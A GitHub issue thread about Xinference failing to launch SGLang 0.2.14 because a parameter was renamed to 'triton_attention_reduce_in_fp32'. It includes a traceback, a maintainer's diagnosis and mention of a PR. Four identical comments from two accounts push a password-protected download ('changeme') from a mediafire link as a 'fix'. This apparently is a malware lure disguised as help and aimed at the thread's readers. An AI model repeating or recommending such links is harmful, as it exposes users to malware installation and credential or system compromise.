### ISSUE TITLE
SGLang: unexpected keyword argument 'attention_reduce_in_fp32'

### ISSUE THREAD

**Issue by lordk911** [xorbitsai/inference#2169]
### System Info / 系統信息
ubuntu 22.04
nvidia-smi : CUDA Version: 12.4
pip list | grep cuda : 12.1.105
sglang: 0.2.14
torch: 2.4.0
flashinfer: flashinfer-0.1.5+cu124torch2.4-cp310-cp310-linux_x86_64.whl

### Running Xinference with Docker? / 是否使用 Docker 运行 Xinfernece？

- [ ] docker / docker
- [X] pip install / 通过 pip install 安装
- [ ] installation from source / 从源码安装

### Version info / 版本信息

Version: 0.14.3

### The command used to start Xinference / 用以启动 xinference 的命令

nohup xinference-supervisor -H "x" > xinference-supervisor.log &

nohup xinference-worker -e "http://x:9997" -H "x" --log-level debug > xinference-worker.log &

### Reproduction / 复现过程

1、 xinference launch -n qwen2-instruct -u qwen2-72B-instruct -s 72 -f awq --gpu-idx 0,1 --context_length 32000 -e "http://x:9997" --worker-ip x --model-engine sglang

2、worker 日志：
`2024-08-27 11:22:25,730 xinference.model.llm.sglang.core 1703653 INFO     Loading qwen2-72B-instruct with following model config: {'trust_remote_code': True, 'context_length': 32000, 'tokenizer_mode': 'auto', 'tp_size': 2, 'mem_fraction_static': 0.87, 'log_level': 'info', 'attention_reduce_in_fp32': False}`

3、报错：
```
2024-08-27 11:22:26,426 xinference.core.worker 1694018 ERROR    Failed to load model qwen2-72B-instruct-1-0
Traceback (most recent call last):
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/xinference/core/worker.py", line 888, in launch_builtin_model
    await model_ref.load()
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/xoscar/backends/context.py", line 231, in send
    return self._process_result_message(result)
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/xoscar/backends/context.py", line 102, in _process_result_message
    raise message.as_instanceof_cause()
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/xoscar/backends/pool.py", line 656, in send
    result = await self._run_coro(message.message_id, coro)
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/xoscar/backends/pool.py", line 367, in _run_coro
    return await coro
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/xoscar/api.py", line 384, in __on_receive__
    return await super().__on_receive__(message)  # type: ignore
  File "xoscar/core.pyx", line 558, in __on_receive__
    raise ex
  File "xoscar/core.pyx", line 520, in xoscar.core._BaseActor.__on_receive__
    async with self._lock:
  File "xoscar/core.pyx", line 521, in xoscar.core._BaseActor.__on_receive__
    with debug_async_timeout('actor_lock_timeout',
  File "xoscar/core.pyx", line 526, in xoscar.core._BaseActor.__on_receive__
    result = await result
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/xinference/core/model.py", line 303, in load
    self._model.load()
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/xinference/model/llm/sglang/core.py", line 120, in load
    self._engine = sgl.Runtime(
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/sglang/api.py", line 40, in Runtime
    return Runtime(*args, **kwargs)
  File "/data/miniconda3/envs/xinference/lib/python3.10/site-packages/sglang/srt/server.py", line 502, in __init__
    self.server_args = ServerArgs(*args, log_level=log_level, **kwargs)
TypeError: [address=10.9.27.41:36223, pid=1703653] ServerArgs.__init__() got an unexpected keyword argument 'attention_reduce_in_fp32'
```

### Expected behavior / 期待表现

没升级前是可以用sglang的，
升级使用：pip install -U "xinference[all]" 后发现 xinference的版本还是0.14.2 
于是 直接执行了 pip install xinference==0.14.3
同时升级了flashinfer的版本

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qinxuye** [comment]
我看了下 sglang 0.2.14 把这个属性命名为 `triton_attention_reduce_in_fp32`

https://github.com/sgl-project/sglang/blob/f25f4dfde5af9a81be52c1ba6d99cc2ac5cca179/python/sglang/srt/server_args.py#L91

有没有兴趣提个 PR？判断下 sglang 的版本，对于不同版本设置不同属性。

**Comment by lordk911** [comment]
> 我看了下 sglang 0.2.14 把这个属性命名为 `triton_attention_reduce_in_fp32`
> 
> https://github.com/sgl-project/sglang/blob/f25f4dfde5af9a81be52c1ba6d99cc2ac5cca179/python/sglang/srt/server_args.py#L91
> 
> 有没有兴趣提个 PR？判断下 sglang 的版本，对于不同版本设置不同属性。

I‘ve tried to submitting a PR.
